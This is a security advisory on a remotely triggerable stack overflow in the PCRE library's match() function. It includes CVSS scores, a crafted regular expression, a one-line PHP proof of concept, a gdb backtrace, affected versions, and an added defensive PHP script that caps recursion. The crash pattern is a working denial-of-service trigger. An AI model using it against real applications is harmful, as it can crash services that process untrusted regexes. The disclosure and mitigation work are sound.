PCRE Library Call Stack Overflow Vulnerability in match()

2015.06.03
Credit: Wen Guanxing
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

I. Summary

PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx and PHP. The PCRE library is prone to a vulnerability which leads to a stack overflow. Without enough bound checking inside match(), the stack memory can be overflowed via a crafted regular expression. Since the PCRE library is widely used, this vulnerability should affect many applications. At the least, an attacker may exploit this issue to DoS the user running the affected application.

------------------------------------------------------------------

II. Description

The latest version of PCRE is prone to a stack overflow vulnerability which can be triggered by the following regular expression:

    /^(?:(?(1)\\.|([^\\\\W_])?)+)+$/

To reproduce the problem, we can use pcretest, provided by the PCRE library, or an application which wraps PCRE, such as PHP. For pcretest, simply type the regular expression after the re> prompt. For PHP, the latest version of PHP 5.6.9 (bundled with PCRE 8.37) can be triggered by the following code snippet:

    <?php preg_match("/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/","abcd",$arr); ?>

Other versions and applications may also be affected. The following test was conducted under Kali Linux (based on Debian x64) with PHP 5.6.9:

==============================================================
(gdb) r poc.php
Program received signal SIGSEGV, Segmentation fault.
0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB", ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4, md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
1439 RMATCH(eptr, ecode, offset_top, md, eptrb, RM49);
(gdb) bt
#0 0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB", ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4, md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#1 0x000000000047e2ee in match (eptr=0x7ffff7eb7d91 "DLAB", ecode=0x10070dd "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4, md=<optimized out>, eptrb=0x0, rdepth=11129) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:2061
#2 0x0000000000472f45 in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070b4 "\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11128) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:983
#3 0x0000000000472e2d in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11127) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1878
#4 0x0000000000472957 in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=0x7fffffffa9a0, eptrb=0x0, rdepth=11126) at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#5 0x000000000047e2ee in match (eptr=0x7ffff7eb7d90 "ADLAB", ecode=0x10070e0 "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2, md=<optimized out>, eptrb=0x0, rdepth=11125)

------------------------------------------------------------------

III. Impact

Stack Overflow

------------------------------------------------------------------

IV. Affected

PCRE 8.33, 8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable. PCRE2 10.10 is also confirmed to be vulnerable. Other applications may also be affected.

------------------------------------------------------------------

V. Credit

Wen Guanxing from Venustech ADLAB is credited for this vulnerability.
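The backtrace above shows match() recursing more than eleven thousand frames deep (rdepth=11130) before the C stack runs out. The PHP script below is an added defensive example, not code from the advisory, from PCRE or from PHP: it wraps preg_match() in an explicit recursion and backtracking budget so that the advisory's pattern fails with a reportable error instead of a segmentation fault. The function names, the limit values and the output format are assumptions chosen for illustration; the pattern and subject are the ones given in section II.

```php
<?php
// Added example (not part of the advisory, PCRE or PHP): bound PCRE's recursion
// depth from PHP so a pathological pattern fails with an error instead of
// exhausting the C stack inside match(). Limits and names are illustrative.

define('ADVISORY_PATTERN', "/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/");
define('ADVISORY_SUBJECT', 'abcd');

// Translate preg_last_error() codes into something a log line can carry.
function describe_preg_error($code)
{
    switch ($code) {
        case PREG_RECURSION_LIMIT_ERROR: return 'recursion limit reached';
        case PREG_BACKTRACK_LIMIT_ERROR: return 'backtrack limit reached';
        case PREG_INTERNAL_ERROR:        return 'internal PCRE error';
        default:                         return 'preg error code ' . $code;
    }
}

// Run preg_match() under an explicit recursion and backtracking budget.
// Returns array('status' => 'match'|'nomatch'|'error', 'error' => string|null,
//               'matches' => array).
function bounded_preg_match($pattern, $subject, $recursionLimit = 5000, $backtrackLimit = 1000000)
{
    // Remember the current settings so the budget only applies to this call.
    $saved = array(
        'pcre.recursion_limit' => ini_get('pcre.recursion_limit'),
        'pcre.backtrack_limit' => ini_get('pcre.backtrack_limit'),
        'pcre.jit'             => ini_get('pcre.jit'),
    );

    // The recursion limit only governs the interpreting matcher in pcre_exec();
    // the JIT (PHP 7+, pcre.jit=1 by default) uses its own stack limit instead.
    // Disabling it here makes the limit below authoritative. On PHP 5.6 the
    // pcre.jit option does not exist and ini_set() simply returns false.
    ini_set('pcre.jit', '0');
    ini_set('pcre.recursion_limit', (string) $recursionLimit);
    ini_set('pcre.backtrack_limit', (string) $backtrackLimit);

    try {
        $matches = array();
        $rc  = preg_match($pattern, $subject, $matches);
        $err = preg_last_error();
    } finally {
        foreach ($saved as $key => $value) {
            if ($value !== false) {
                ini_set($key, $value);
            }
        }
    }

    // preg_match() returns false (without throwing) when a PCRE limit is hit.
    if ($rc === false) {
        return array('status' => 'error', 'error' => describe_preg_error($err), 'matches' => array());
    }
    return array(
        'status'  => $rc === 1 ? 'match' : 'nomatch',
        'error'   => null,
        'matches' => $matches,
    );
}

$result = bounded_preg_match(ADVISORY_PATTERN, ADVISORY_SUBJECT);
printf("status=%s error=%s\n", $result['status'],
       $result['error'] === null ? '-' : $result['error']);
```

Run it from the command line with php. The budget has to be sized against the C stack actually available to the thread performing the match: the crash above happened at rdepth=11130 under PHP's default pcre.recursion_limit of 100000, so the default alone does not protect a build that keeps match() state on the stack. The same budget can be applied from C through the match_limit_recursion field of pcre_extra (flag PCRE_EXTRA_MATCH_LIMIT_RECURSION), and PCRE can also be built with --disable-stack-for-recursion so that match() keeps its state on the heap rather than in nested stack frames.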


Copyright 2024, cxsecurity.com